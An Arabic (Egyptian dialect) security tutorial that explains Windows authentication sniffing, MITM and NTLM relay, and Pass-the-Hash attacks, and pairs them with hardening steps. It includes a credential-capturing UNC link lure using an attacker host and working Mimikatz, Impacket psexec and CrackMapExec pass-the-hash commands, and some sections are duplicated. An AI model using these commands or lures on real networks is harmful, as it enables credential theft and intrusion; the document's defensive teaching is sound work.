👂 التنصت على تبادل الباسورد في الشبكة
تخمين الباسوردات شغلانة متعبة جدا 😩... طب ليه نتعب نفسنا؟ ليه ما نسمعش البيانات وهي بتتبعت في الشبكة ونلقط الـ credentials وقت ما اليوزر بيسجلوا دخول؟ وبعد كده نعيد استخدامهم ونخش بيهم 😏.
لو الهاكر قدر يتنصت على عملية تسجيل الدخول في ويندوز، ده هيوفر عليه كتير من العك العشوائي بتاع التخمين. فيه ٣ أنواع رئيسية من الهجمات دي على ويندوز:
🔹 LM
🔹 NTLM
🔹 Kerberos
👾 هجمات LM (LAN Manager القديمة)
دي بروتوكول قديم جدا، وكان فيه نقطة ضعف خطيرة في طريقة التحدي/الاستجابة (challenge/response) بتاعت ويندوز، بتخلي تخمين الـ LM hash سهل جدا. الـ hash ده ممكن تستخدمه زي ما هو أو تكسره وتجيب الباسورد النصي 🧩.
مايكروسوفت قفلت الثغرة دي من أيام Windows 2000، بس فيه لسه شبكات شغالة بالبروتوكول ده علشان أجهزة قديمة أو إعدادات مش آمنة 💀.
🔧 الأدوات اللي بتستخدم في كسر LM:
- اداة Cain (من موقع oxid.it) 🛠
- اداة LCP (من lcpsoft.com)
- اداة John the Ripper Jumbo (نسخة مطورة لدعم LM وغيره من أنواع التشفير - openwall.com)
- اداة L0phtcrack (أداة تجارية فيها نسخة تجريبية 14 يوم - l0phtcrack.com)
في L0phtcrack وCain، فيه خاصية مدمجة للتنصت على الشبكة عن طريق WinPcap. إنما LCP وJohn محتاجين تستورد ملفات التنصت يدويا.
والأفضل فيهم هو Cain👑، لأنه بيدمج التنصت وكسر الباسوردات لكل البروتوكولات (LM, NTLM, Kerberos) ويدعم:
- brute-force🥵
- dictionary attacks📚
- Rainbow tables (محتاج حساب مدفوع💸)
⚠️وبالمناسبة، لو فكرت إن الشبكات اللي فيها switches بتمنع sniffing، تبقى غلطان. الهاكر يقدر يستخدم ARP spoofing ويخلي كل الترافيك يعدي عليه، وبكده يشم كل حاجة 🕵️♂️.
Cain كمان فيه خاصية ARP poisoning جاهزة.
فيه كمان حيلة تانية خبيثة 🧠:
الهاكر ممكن يبعتلك إيميل فيه لينك زي:
file://attackerscomputer/sharename/message.html
ولو دوست عليه، الويندوز هيحاول يتصل بالسيرفر ده ويبعته credentials بتاعتك عشان يعمل auth تلقائي 😨.
🔒 هجمات على Kerberos
رغم إن Kerberos موجود من أول Windows 2000 ومتين أكتر، بس برضو اتعرض لهجمات sniffing.
فيه بحث اتنشر سنة 2002 من Frank O’Dwyer شرح إن Kerberos بيبعت packet فيها timestamp معروف، مشفر بمفتاح معمول من باسورد المستخدم.
الهاكرز بيعملوا brute-force أو dictionary attack عشان يفكوا التشفير ده. لو النتيجة شكلها شبه timestamp، يبقى جابوا الباسورد.
اداة Cain فيه sniffer مخصص للـ MSKerb5-PreAuth packets، وفيه أدوات تانية زي:
- KerbSniff
- KerbCrack (من ntsecurity.nu/toolbox/kerbcrack)
🛡 إزاي تحمي نفسك من هجمات التنصت على Windows Authentication
أهم خطوة علشان تمنع هجمات LM response هي إنك تقفل بروتوكول LM خالص.
ليه؟ علشان أدوات زي Cain بتعتمد على رد الـ LM علشان تطلع الباسوردات.
لو منعت رد الـ LM يوصل على الشبكة، كده أنت قفلت باب الهجوم ده تماما 🔒.
💡 بروتوكول NTLM مش فيه نفس ضعف LM، بس لو الباسورد ضعيف، لسه ممكن يتكسر... بس هيخد وقت أطول 💭.
📍من Windows NT 4.0 Service Pack 4، مايكروسوفت أضافت قيمة في الرجستري بتتحكم في استخدام LM:
HKLM\System\CurrentControlSet\Control\LSA\LMCompatibilityLevel
لو القيمة كانت 4 أو أكتر، الـ Domain Controller مش هيقبل طلبات LM auth❌.
✅من أول Windows 2000، بقي أسهل تغير الإعداد ده من الـ Security Policy GUI.
دور على الإعداد ده:
Network Security: LAN Manager Authentication Level
فيه 6 مستويات، من الأقل أمانا للأكتر. بننصح إنك تستخدم على الأقل المستوى التاني:
"Send NTLM Response Only" ✉️
أما في Windows Vista، Server 2008، 7، Server 2008 R2، و احدث, فالقيمة الافتراضية بقت أصلا:
"Send NTLMv2 Response Only"
ودي أقوى وأأمن، بس ممكن تسبب مشاكل لو عندك أجهزة قديمة في الشبكة🖥.
🛡بالنسبة لهجمات sniffing على Kerberos
مفيش قيمة واحدة في الرجستري تمنعها زي LM للأسف.
حتى تفعيل التشفير على الـ secure channel ما بيمنعش الهجوم ده😑، ومايكروسوفت ما قدمتش حل مباشر.
فأنت قدامك الدفاع الكلاسيكي:
🔑استعمل باسوردات قوية ومعقدة.
📄عم Frank O’Dwyer قال في بحثه إن:
باسورد مكوّن من 8 حروف، بحروف كابيتال وصمول وأرقام، هياخد 67 سنة علشان يتكسر على جهاز Pentium 1.5GHz⌛️.
بس طبعا دلوقتي البروسيسورات بقت أقوى بكتير!
معالج زي Intel i7 سداسي النواة ممكن يكسر نفس الباسورد ده في حوالي سنة ونص😬.
ولو الباسورد موجود في قاموس؟ يتكسر فـ ثواني⏱️.
👨💻في بحث Kasslin وTikkanen، اقترحوا طرق إضافية لحماية Kerberos:
🔐استخدم PKINIT preauthentication
دي طريقة بـ تستخدم مفاتيح عامة بدل الباسوردات، فـ مفيش حاجة تتشم.
🔒فعل IPSec في ويندوز، علشان تعمل تشفير وتوثيق للترافيك كله.
🛡 أسلحة الدفاع السيبراني في ويندوز: لما مايكروسوفت لبست الدرع وقالت “كفاية هجمات” 🔐🧠
🔥 جدار الحماية: أول خط في وش الصدمة
زمان، كان الاختراق على ويندوز زي المشي في الشارع، من غير مطبات ولا لجان 😅.
لكن من بعد Windows XP Service Pack 2، مايكروسوفت قررت تلبّس الويندوز درع حديد وتنصب له بوابة حديدية تمنع أي حد غريب يعدي. الجدار الناري بقى شغال بسياسة "إقفل كل حاجة وخلي المستخدم يفتكر"، وده قلل بشكل كبير استغلال الثغرات التلقائية.
الجدار ده مش firewall عادي، ده host-based، يعني جوه النظام نفسه، ومن أول لحظة تشغيل الجهاز هو بيراقب الترافيك زي شرطي مرور مش ناوي يبتسم لأي packet شكلها غريب.
ومش بس كده، لو انت مسؤول شبكة وبتدير ألف جهاز، تقدر تتحكم في إعدادات الجدار ده من خلال Group Policy كأنك قائد كتيبة، وبتوزع أوامر الدفاع من مكتبك.
ومع الإصدارات الجديدة زي Vista و7، الجدار اتحول من مجرد سد إلى قلعة، واتسمّى "Windows Firewall with Advanced Security"، وبقى عندك تحكم تفصيلي في كل اتصال طالع وداخل. يعني باختصار؟ الجدار ده بقى عنده عضلات ودماغ.
⚙️ التحديثات التلقائية: السلاح اللي بيشتغل وانت نايم
لو فيه هجمة لسه مكتشفة من يومين، إيه أكتر حاجة ممكن تحميك غير إن النظام بتاعك ياخد تحديث من مايكروسوفت وهو ساكت؟ هنا ييجي دور التحديثات التلقائية، اللي هي حرفيًا الدكتور المتخفي اللي بيطّعم جهازك ضد الأمراض قبل ما توصل له.
التحديثات دي مش رفاهية، دي ضرورة. ومع الوقت، بقت بتشتغل بشكل ذكي، تنزل في الخلفية، تتثبت وأنت بتعمل شاي، ومن غير ما تحس، تلاقي ثغرة zero-day اتحولت لـ “zero effect”.
ناس كتير كانت بتحب تقفلها، بحجة "أنا فاهم وبعرف أحدث يدوي"... بس الصراحة؟ لا، أنت مش هتدخل على موقع مايكروسوفت تدور على KB رقم 23923 عشان تسد ثغرة في Windows Defender. خلّي النظام يشتغل لحسابه، وأنت ركز في شغلك.
🧯 مركز الأمان: لوحة العدادات بتاعتك يا كابتن
مايكروسوفت لاحظت إن المستخدم العادي غالبًا مش هيروح يدور في أعماق Control Panel علشان يعرف هل الجدار شغال؟ هل فيه أنتي فايروس؟ هل فيه تحديث؟
فقالوا يخلوا كل ده في واجهة واحدة شبه Dashboard… وسّموها "Security Center".
هنا تقدر تشوف حالة الأمان بتاعة جهازك من غير ما تفتح ١٠ نوافذ. الجدار الناري شغال؟ التحديثات جاية؟ فيه أنتي فايروس ولا لأ؟
كل ده يبان هنا... وبألوان كمان، علشان لو حصل مصيبة، يبقى لون أحمر يزعق في وشك.
بس خلّي بالك، مركز الأمان معمول أكتر للي بيخافوا من الـ CMD وبيحبوا الحلول البصرية... مش للمحترفين اللي بيعدلوا في Group Policy وهم مغمضين.
🧩 سياسة الأمان وسياسة المجموعة: لما تكون بتدير إمبراطورية
لو شغلك مسؤول شبكة، فـ Group Policy هي العصاية السحرية بتاعتك.
إنت مش هتدخل على كل جهاز وتغيّر إعدادات الأمان يدويًا، ده انتحار.
سياسة الأمان بتديك واجهة موحدة تظبط منها الإعدادات العامة، لكن لما تيجي للجد وتحب تفرض إعدادات على 1000 جهاز مرة واحدة، ساعتها تدخل GPO وتقولهم “كلكم تبطلوا تستخدموا LM authentication”، أو “كلكم تقفلوا منافذ معينة”، وكل الأجهزة تسمع الكلام وانت بتشرب نسكافيه.
الموضوع مش بس قوي… ده مُخيف لو في إيد الشخص الغلط. بس لو إنت الصح، فانت الملك.
🦠الـ Microsoft Security Essentials: الفقير الجدع
في وقت من الأوقات، كان أغلب برامج مكافحة الفيروسات يا إما تقيلة، يا إما مدفوعة، يا إما بتزعق كل ما تفتح المتصفح. مايكروسوفت قالت: طب ما نعمل حاجة خفيفة وبتشتغل... وطلعت Microsoft Security Essentials.
هو مش أقوى برنامج في السوق، بس بيعمل شغل محترم، خصوصًا إنه مدمج وبيشتغل في الخلفية من غير ما يضربك Notifications على كل Cookie.
الحماية في الوقت الحقيقي، المسح، التحديثات التلقائية… كله موجود. ولو انت واحد من الناس اللي مش بتحب تنزل برامج من برّه، دي صفقة ممتازة.
🛡 الEMET: دروع إضافية لأي برنامج خايب
أحيانًا بيكون عندك برنامج قديم، بس مهم، ومفيش بديل ليه. المشكلة؟ البرنامج ده مليان ثغرات، بس مايكروسوفت قالت: “ما تقلقش… هنحط له درع من برّه”.
هنا يظهر EMET – أداة مجانية بتخليك تضيف تقنيات تخفيف (Mitigations) زي DEP وASLR حتى لو البرنامج نفسه مش بيدعمهم.
يعني بدل ما تغير البرنامج أو تعيد ترجمته، EMET بيدخل كطرف ثالث وبيقول للثغرات: “أنتوا مش هتعدّوا من هنا” 🔒
الواجهة الرسومية كمان سهلة، يعني مش لازم تبقى محترف في الـ PowerShell علشان تظبط الحماية. تختار التطبيق، تختار نوع الحماية، وتسيبه في حاله.
🔐 الـ BitLocker وEFS: التشفير مش رفاهية
زمان كنت تشيل ملفاتك المهمة على الديسك C وتكتب جنبها "لا تفتحه"، وتفتكر إن كده محدش هيقرب... بس الحقيقة؟ أي هكر مبتدئ يقدر ياخد الهارد ويشوف كل حاجة وانت مش اخد بالك.
مايكروسوفت قالت "كفاية تهريج" ونزلت EFS في البداية لتشفير الملفات نفسها، وبعدها دخلت تقيلة بـ BitLocker، اللي بيشفّر الهارد بالكامل، ويقفل الجهاز بمفتاح تشفير مستحيل يتخمن (إلا لو انت حاطط الباسورد: 123456 🙃).
لو جهازك اتسرق، أو حد حاول يقلع من USB ويخش على ملفاتك، BitLocker بيقول له: "مفيش دخول يا فندم، روح العب غيرها".
وده غير إن المفاتيح نفسها بتتخزن بطرق صعبة جدًا الاختراق، خصوصًا لو الجهاز فيه TPM. فبدل ما تعتمد على حظك، خليك مؤمن ومشفّر.
فيه نوع من الهاكرز اللي مش بيخترق جهازك من برّه، لأ، بيخش جوه جوه… ويبدأ يلعب في ملفات النظام زي ما يكون بيحرك كراسي في بيته.
علشان كده مايكروسوفت رجعت حسّنت ميزة قديمة كانت اسمها "Windows File Protection"، وطلعت لنا Windows Resource Protection (WRP).
الميزة دي ببساطة بتحط شريط أصفر حوالين ملفات النظام والريجستري وبتقولك: "خلي بالك… اللي هيقرب هيندم". مفيش حد يقدر يعدّل في الملفات المحمية دي إلا كيان اسمه TrustedInstaller، اللي هو تقريبًا سوبرمان بتاع السيستم.
يعني حتى لو فيروس قرر يلعب، هيلقي الباب مقفول بالسلاسل… وهيقعد يتفرج بس.
زمان كنت تفتح أي برنامج وهو ياخد صلاحيات أدمن كأنك بتوزّع شاي، وكل برنامج عنده القدرة يعدّل في الريجستري ويمسح system32 من غير ما تستأذن. فدخلت مايكروسوفت بالـ UAC وقالت: "ثانية واحدة، إنت متأكد؟".
دلوقتي، حتى لو انت أدمن، بتدخل بـ "صلاحيات مخففة"، والويندوز بيدي البرامج إذن الصلاحية الكاملة بس لما إنت توافق. يعني بقت فيه خطوة زيادة، بس خطوة بتفرق بين حياة الجهاز وموته.
ومع ILs – Integrity Levels، بقى كل برنامج ليه مستوى أمان. برامج الإنترنت؟ اشتغلت بمستوى أمان منخفض، علشان حتى لو اتخترقت، تفضل محبوسة في sandbox ومتعرفش تعمل مصايب.
ودي الفكرة من Protected Mode Internet Explorer، اللي كان شغال كأنه متصفح على جزيرة منعزلة… علشان لو اتضرب، ماينقلش العدوى للنظام كله.
فيه نوع من الهجمات اسمه buffer overflow، بيحاول يشغّل كود ضار في أماكن المفروض تكون بس للتخزين. فـ DEP (Data Execution Prevention) بيدخل يقول: "المكان ده للبيانات بس يا باشا، مفيش كود هيتنفذ هنا".
الجميل؟ إن DEP بيشتغل hardware وsoftware. يعني حتى لو الهاكر عمل حركته، المعالج نفسه يقول لأ.
ودي نقطة قوة حقيقية... النظام مش بس بيعتمد على البرامج، ده كمان بيشغل الهاردوير نفسه يحميك.
اللي يعرف “Shatter Attack” يعرف إن الخدمات زمان كانت ماشية في Session 0 جنب المستخدمين، والنتيجة؟ أي برنامج ممكن يبعت رسالة للتحكم في خدمة بصلاحيات SYSTEM 😬.
مايكروسوفت قالت لأ. من Vista وطالع، فصلت الخدمات عن المستخدمين، وخلّت Session 0 للحاجات التقيلة بس. كمان بدأت تخلي الخدمات تشتغل بأقل صلاحيات ممكنة، وتمنعها من إنها تفتح network sockets أو تكتب في أماكن مش من حقها.
يعني بدل ما الخدمة تبقى Wildcard، بقت محكومة… كأنها موظف شغال في قسم مغلق ومعاه تصريح محدود. أقل خطأ؟ مفيش صلاحية، مفيش كارثة.
مايكروسوفت قالت ليه نستنى لحد وقت التشغيل؟ ما نمنع الثغرات من وقت الترجمة!
فبدأت تستخدم تقنيات زي:
يعني باختصار: حتى لو فيه خطأ في الكود، النظام والـ Compiler بيقولوله "إحنا غطيناك".
✅ الخاتمة: لما الأمان بقى لعبة كبار
مايكروسوفت دلوقتي مش بتقول “احمي نفسك”، دي بتقول: “أنا عملت اللي عليا... الباقي عليك”.
ويندوز الحديث بقى أشبه بقصر منيع، مليان حراس، بوابات إلكترونية، وشبكة إنذار داخلي.
بس تعرف إيه؟
كل ده بيروح في لحظة... لو إنت فتحت attachment مشبوه، أو دخلت باسوردك في موقع اسمه login.faceb00k.ru 😬.
الميزان الحقيقي مش في الأدوات، لكن في اللي بيستخدمها.
لو فهمت الأسلحة دي، وفعلتها صح، وخلّيت سلوكك ذكي… يبقى أنت رسميًا دخلت نادي المحصنين.
أما لو سيبت كل حاجة مفتوحة وقلت "أنا مش مهم"، فمبروك... بقيت lunch للهاكرز 🍽.
فكّر، فعل، راقب… وسيّب الاختراق للي مش بيقرأ المقال ده 😏.
لو جهازك اتسرق، أو حد حاول يقلع من USB ويخش على ملفاتك، BitLocker بيقول له: "مفيش دخول يا فندم، روح العب غيرها".
وده غير إن المفاتيح نفسها بتتخزن بطرق صعبة جدًا الاختراق، خصوصًا لو الجهاز فيه TPM. فبدل ما تعتمد على حظك، خليك مؤمن ومشفّر.
🧱 حماية موارد ويندوز (WRP): لما النظام يقولك "إيدك بعيدًا"
فيه نوع من الهاكرز اللي مش بيخترق جهازك من برّه، لأ، بيخش جوه جوه… ويبدأ يلعب في ملفات النظام زي ما يكون بيحرك كراسي في بيته.
علشان كده مايكروسوفت رجعت حسّنت ميزة قديمة كانت اسمها "Windows File Protection"، وطلعت لنا Windows Resource Protection (WRP).
الميزة دي ببساطة بتحط شريط أصفر حوالين ملفات النظام والريجستري وبتقولك: "خلي بالك… اللي هيقرب هيندم". مفيش حد يقدر يعدّل في الملفات المحمية دي إلا كيان اسمه TrustedInstaller، اللي هو تقريبًا سوبرمان بتاع السيستم.
يعني حتى لو فيروس قرر يلعب، هيلقي الباب مقفول بالسلاسل… وهيقعد يتفرج بس.
👮♂️ الـ UAC، ILs، وProtected Mode IE: خليك مسؤول عن قراراتك
زمان كنت تفتح أي برنامج وهو ياخد صلاحيات أدمن كأنك بتوزّع شاي، وكل برنامج عنده القدرة يعدّل في الريجستري ويمسح system32 من غير ما تستأذن. فدخلت مايكروسوفت بالـ UAC وقالت: "ثانية واحدة، إنت متأكد؟".
دلوقتي، حتى لو انت أدمن، بتدخل بـ "صلاحيات مخففة"، والويندوز بيدي البرامج إذن الصلاحية الكاملة بس لما إنت توافق. يعني بقت فيه خطوة زيادة، بس خطوة بتفرق بين حياة الجهاز وموته.
ومع ILs – Integrity Levels، بقى كل برنامج ليه مستوى أمان. برامج الإنترنت؟ اشتغلت بمستوى أمان منخفض، علشان حتى لو اتخترقت، تفضل محبوسة في sandbox ومتعرفش تعمل مصايب.
ودي الفكرة من Protected Mode Internet Explorer، اللي كان شغال كأنه متصفح على جزيرة منعزلة… علشان لو اتضرب، ماينقلش العدوى للنظام كله.
🧠 الـ DEP: ممنوع التنفيذ إلا بتصريح
فيه نوع من الهجمات اسمه buffer overflow، بيحاول يشغّل كود ضار في أماكن المفروض تكون بس للتخزين. فـ DEP (Data Execution Prevention) بيدخل يقول: "المكان ده للبيانات بس يا باشا، مفيش كود هيتنفذ هنا".
الجميل؟ إن DEP بيشتغل hardware وsoftware. يعني حتى لو الهاكر عمل حركته، المعالج نفسه يقول لأ.
ودي نقطة قوة حقيقية... النظام مش بس بيعتمد على البرامج، ده كمان بيشغل الهاردوير نفسه يحميك.
🔒 تقوية خدمات ويندوز: مش كل خدمة تستاهل صلاحيات ربنا
اللي يعرف “Shatter Attack” يعرف إن الخدمات زمان كانت ماشية في Session 0 جنب المستخدمين، والنتيجة؟ أي برنامج ممكن يبعت رسالة للتحكم في خدمة بصلاحيات SYSTEM 😬.
مايكروسوفت قالت لأ. من Vista وطالع، فصلت الخدمات عن المستخدمين، وخلّت Session 0 للحاجات التقيلة بس. كمان بدأت تخلي الخدمات تشتغل بأقل صلاحيات ممكنة، وتمنعها من إنها تفتح network sockets أو تكتب في أماكن مش من حقها.
يعني بدل ما الخدمة تبقى Wildcard، بقت محكومة… كأنها موظف شغال في قسم مغلق ومعاه تصريح محدود. أقل خطأ؟ مفيش صلاحية، مفيش كارثة.
🧬 تحسينات الترجمة: لما الـ Compiler نفسه يدخل يلعب دور الحارس
مايكروسوفت قالت ليه نستنى لحد وقت التشغيل؟ ما نمنع الثغرات من وقت الترجمة!
فبدأت تستخدم تقنيات زي:
🔸 GS: بتحط "كوكي" على الـ Stack… لو الهاكر حاول يعدّي منها، بتنكشف المحاولة
🔸SafeSEH: بتخلي الـ exception handler شرعي بس
🔸 ASLR: بتخرب دماغ أي هكر بيحاول يعرف مكان الأكواد في الميموري… لأنه كل مرة العناوين بتتغير، والبرنامج بيتلخبط في مكانه
يعني باختصار: حتى لو فيه خطأ في الكود، النظام والـ Compiler بيقولوله "إحنا غطيناك".
✅ الخاتمة: لما الأمان بقى لعبة كبار
مايكروسوفت دلوقتي مش بتقول “احمي نفسك”، دي بتقول: “أنا عملت اللي عليا... الباقي عليك”.
ويندوز الحديث بقى أشبه بقصر منيع، مليان حراس، بوابات إلكترونية، وشبكة إنذار داخلي.
بس تعرف إيه؟
كل ده بيروح في لحظة... لو إنت فتحت attachment مشبوه، أو دخلت باسوردك في موقع اسمه login.faceb00k.ru 😬.
الميزان الحقيقي مش في الأدوات، لكن في اللي بيستخدمها.
لو فهمت الأسلحة دي، وفعلتها صح، وخلّيت سلوكك ذكي… يبقى أنت رسميًا دخلت نادي المحصنين.
أما لو سيبت كل حاجة مفتوحة وقلت "أنا مش مهم"، فمبروك... بقيت lunch للهاكرز 🍽.
فكّر، فعل، راقب… وسيّب الاختراق للي مش بيقرأ المقال ده 😏.
🕵️♂️ هجمات Man-in-the-Middle (MITM) ضد بروتوكولات Windows
هجمات MITM على بيئات Windows لسه بتمثل تهديد كبير، خصوصا في الشبكات اللي بتستخدم مصادقة NTLM أو بتعتمد على بروتوكولات زي SMB, LDAP, HTTP, RDP، وغيرها. المهاجم بيحاول يدخل بين العميل والسيرفر في لحظة المصادقة أو تبادل البيانات، ويسيطر على الاتصال بالكامل.
🌀 طبيعة الهجوم:
هجوم MITM في بيئة Windows بيتم عبر سيناريوهين رئيسيين:
1. ترحيل بيانات المصادقة (NTLM Relay):
المهاجم يلتقط محاولة مصادقة NTLM من جهاز الضحية، ويرحلها مباشرة لسيرفر تاني، ويقدر يدخل بنفس صلاحيات الضحية، وينفذ أوامر أو يسحب بيانات.
2. التلاعب بالاتصال (Session Hijacking):
بعد نجاح المصادقة، المهاجم يحتفظ بالـ session tokens أو التذاكر (في بعض البروتوكولات)، ويسيطر على الجلسة الفعلية، يقدر يتجسس، يعدل بيانات، أو يدخل أوامر بصلاحيات الضحية.
🧪 تقنيات تنفيذ الهجوم:
📡 1. إجبار الضحية على الاتصال بسيرفر خبيث:
المهاجم بيستخدم بروتوكولات زي LLMNR أو NBNS أو IPv6 spoofing علشان يوجه الضحية تلقائيا لسيرفر مزيف بدون ما المستخدم يحس.
🧲 2. إرسال روابط UNC:
المهاجم ممكن يزرع رابط داخل صفحة HTML أو ملف Office يخلي الجهاز يتصل تلقائيا بسيرفر SMB خبيث:
<img src="\\attacker\share\img.png">
أول ما الضحية يفتح الرابط، الجهاز بيبدأ مصادقة NTLM تلقائيا، والمهاجم يلتقطها.
🧬 3. ترحيل المصادقة لبروتوكولات مختلفة:
بعد ما المهاجم ياخد محاولة المصادقة، يقدر يبعتهـا لسيرفر بيقبل NTLM على بروتوكولات تانية زي:
• SMB
• LDAP
• HTTP
• IMAP
• RDP
• MSSQL
وده بيوسع مدى الهجوم بشكل كبير جدا، وبيخلي أي خدمة شغالة جوه الشبكة هدف محتمل.
🔁 4. إجبار الجهاز يبدأ مصادقة NTLM بنفسه:
في بعض الحالات، المهاجم مش بيستنى الضحية يتفاعل، ده ممكن بيجبر الجهاز يرسل مصادقة NTLM تلقائيا، زي استخدام استدعاء لخدمة في النظام تعتمد على WebDAV أو MS-EFSRPC، ودي بتشتغل حتى لو الضحية مش فتحت أي حاجة بنفسها.
😈 النتائج المحتملة:
• تنفيذ أوامر بصلاحيات الضحية على السيرفر الهدف.
• سرقة ملفات أو قواعد بيانات كاملة.
• حركة جانبية (Lateral Movement) داخل الشبكة بمجرد الدخول الأول.
• الوصول لصلاحيات Domain Admin لو الضحية كانت account حساس، أو لو تم ترحيل المصادقة لخدمة ADCS.
• تثبيت backdoors أو أدوات تحكم بدون ما الضحية تحس بأي نشاط مشبوه.
🛡 وسائل الحماية من هجمات Man-in-the-Middle (MITM) في بيئات Windows
هجمات MITM ما بقتش مقتصرة على قرب فعلي من الضحية فقط، خاصة مع وجود شبكات Wi-Fi مفتوحة، وبروتوكولات قديمة لسه مستخدمة جوه مؤسسات كتير. بس رغم كده، في وسائل دفاع قوية لو اتطبقت صح.
✅ 1. التشفير + التوثيق الإجباري
• أي اتصال لازم يكون مشفر وموثق.
• البروتوكولات اللي ما بتدعمش TLS/Mutual Auth بشكل كامل (زي NTLM بدون SMB Signing) لازم يتم التخلص منها أو حصر استخدامها داخليا.
• في بيئات Windows، التشفير + التوثيق بيتم عبر:
• IPSec Policies (Connection Security Rules)
• SMB Signing
• LDAPS / HTTPS / Kerberos فقط
🧠 IPSec في Windows بيتفعل عبر "Connection Security Rules" وبيحتاج إن الطرفين يكونوا أعضاء في نفس AD Domain.
🔐 2. فرض SMB Signing
• الـ SMB Signing بيمنع العبث بجلسات SMB/NTLM.
• اتأكد إن السياسات التالية مفعلة على مستوى GPO:
• Digitally sign communications (always) → Enabled
• Digitally sign client communications (if server agrees) → Disabled
⚠️ التوقيع لازم يكون "إجباري" مش "اختياري"، عشان الأدوات الخبيثة مش تقدر تعطل ميزة التوقيع وتشتغل بدونها.
🚫 3. تعطيل البروتوكولات الضعيفة (NetBIOS / LLMNR / WPAD)
NetBIOS:
• بيعتمد على UDP/137 وده قابل للتزييف بسهولة.
• في الإصدارات الحديثة (Windows 10/11)، تقدر تعطل NetBIOS من إعدادات الـ NIC.
LLMNR + WPAD:
• لازم يتعطلوا باستخدام Group Policy:
• Turn off multicast name resolution → Enabled
• Disable WPAD via DHCP and DNS → Manual
🧱 4. حظر الترافيك الحساس Outbound
• امنع الاتصالات الصادرة (Outbound) لبروتوكولات زي:
• SMB (445)
• LDAP (389)
• RDP (3389)
• MSSQL (1433)
• خصوصا من الأجهزة اللي مش محتاجة تتصل بخدمات داخلية مباشرة.
✅ دايما اربط الأجهزة بسيرفرات محددة باستخدام Access Control Lists (ACLs) أو Segmentation.
🧲 5. كشف ومحاصرة محاولات التزييف والـ MITM
• استخدم أدوات مراقبة داخليا:
• الـ Microsoft Defender for Identity (ATP سابقا) للكشف عن هجمات NTLM Relay وPass-the-Hash.
• الـ Sysmon + SIEM لمراقبة الترافيك المشبوه وطلبات المصادقة المتكررة.
• راقب الترافيك الخارج من الأجهزة نحو عناوين غير معتادة.
⚙️ 6. إلغاء دعم NTLM إن أمكن
• في بيئات حديثة، NTLM لازم يكون disabled أو محصور على أقل عدد ممكن من الأجهزة.
• استخدم Kerberos كخيار افتراضي داخل Active Directory.
• لو ADCS موجود، تأكد إنه مكون بشكل يمنع استغلاله في هجمات Relay.
• استخدم Kerberos كخيار افتراضي داخل Active Directory.
• لو ADCS موجود، تأكد إنه مكون بشكل يمنع استغلاله في هجمات Relay.
بس طبعا كل طريقة حماية من دول ليها طريقه هجوم هنتكلم عنها. 😉
🔐 Pass-the-Hash (PtH)
الـ Pass-the-Hash هي تقنية هجومية خطيرة 😈 بتسمح للمهاجم يستخدم LM أو NTLM hash كأنه الباسورد الحقيقي، ويوصل بيه لسيرفرات أو موارد داخل الشبكة، من غير ما يعرف الباسورد الصريح!
في بيئة Windows، لما يكون المهاجم عنده صلاحيات Local Admin، بيقدر يسحب الهاشات من الذاكرة أو الـ SAM 🧠، ويستخدمهم لتسجيل الدخول في أجهزة تانية عن طريق بروتوكولات زي SMB أو WinRM أو حتى RDP (لو متاح).
⏳ نبذة تاريخية
التقنية بدأت سنة 1997، وفضلت تتطور لحد ما بقت من الأدوات الأساسية في مرحلة ما بعد الاستغلال (Post-Exploitation) 📈.
لكن على مدار السنين، مايكروسوفت حاولت تقلل من فاعليتها عن طريق تغييرات في إدارة الجلسات والذاكرة، خصوصا من بعد Windows 8.1 وServer 2012 R2.
🧰 أدوات بتستخدم PtH:
Mimikatz
من أشهر الأدوات الحديثة - مش بس بتسحب الهاشات، كمان بتنفذ Pass-the-Hash مباشرة:
sekurlsa::logonpasswords
sekurlsa::pth /user:Administrator /domain:DOMAIN /ntlm:<NTLM_hash>
Impacket
مجموعة أدوات قوية جدا من Python بتدعم تنفيذ الأوامر عن بعد باستخدام NTLM hash:
psexec.py -hashes :<NTLM_hash> DOMAIN/Administrator@target_ip
CrackMapExec (CME)
أداة سهلة وسريعة لاختبار الحسابات على الشبكة:
cme smb target_ip -u Administrator -H <NTLM_hash> -d DOMAIN
🛡 طرق الحماية من هجوم Pass-the-Hash (PtH)
الـ Pass-the-Hash مش مجرد ثغرة… ده سلوك نظامي خطير بيتولد من طريقة Windows في إدارة المصادقة بـ NTLM.
بالتالي، مفيش "تحديث" يقفل PtH… لكن فيه مجموعة دفاعات تقلل فرص نجاحه جدا.
🎯 الفكرة الأساسية:
الـ PtH = هجوم Post-Exploitation.
يعني المهاجم لازم يبقى Local Admin على جهاز واحد على الأقل، ويستخرج منه الـ Hash، عشان يبدأ يستخدمها ضد باقي الشبكة.
بالتالي، الحماية لازم تكون متعددة الطبقات. تعال نرتبها من الأهم:
🧱 1. تقليل حسابات الـ Admin وCredential Exposure
✅ امنع Domain Admin من الدخول على الأجهزة العادية
✅ استخدم Tiering Model (مثل ESAE أو "Red Forest")
✅ فعل "Deny logon locally" على السيرفرات لـ الحسابات الحرجة
✅ استخدم حسابات منفصلة للإدارة (Privileged Access Workstations - PAW)
🔒 2. عزل الـ Hash عن المهاجم - منع الوصول لـ LSASS
LSASS Protection (RunAsPPL):
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
"RunAsPPL"=dword:00000001
يحمي عملية LSASS من القرصنة بالأدوات زي Mimikatz.
Credential Guard:
موجود في Windows 10+ وبيستخدم virtualization عشان يعزل الكريدنشلز من النظام نفسه.
WDAC / AppLocker / Device Guard:
يمنع تشغيل أدوات زي Mimikatz من الأساس على النظام.
🔌 3. وقف الخدمات اللي بتقبل NTLM قد ما تقدر
• SMBv1 = ممنوع تماما ❌
• عطل NTLM على مستوى GPO في بيئات حديثة، وخلي Kerberos هو الوحيد:
Computer Configuration → Policies → Windows Settings → Security Settings → Local Policies → Security Options
→ Network security: Restrict NTLM: NTLM authentication in this domain = Deny all
🕵️♂️ 4. المراقبة و الـ Detection
✅ راقب LSASS access
✅ راقب استخدام أدوات زي sekurlsa::pth، psexec, winrm
✅ استخدم SIEM عشان ترصد الأنماط الغريبة:
• تسجيل دخول متكرر من حساب واحد على أجهزة مختلفة
• استخدام NTLM في بيئة المفروض تعتمد على Kerberos
• إنشاء جلسة SMB من جهاز مش مفروض يعمل إدارة
🌐 5. عزل الشبكة وتقسيمها - Segmentation
✅ افصل الـ Workstations عن السيرفرات
✅ امنع lateral movement بـ Firewall rules
✅ فعل LAPS عشان كل جهاز يكون ليه Local Admin password مختلف (ويدار مركزيا)
✌️ 6. مصادقة متعددة العوامل (MFA)
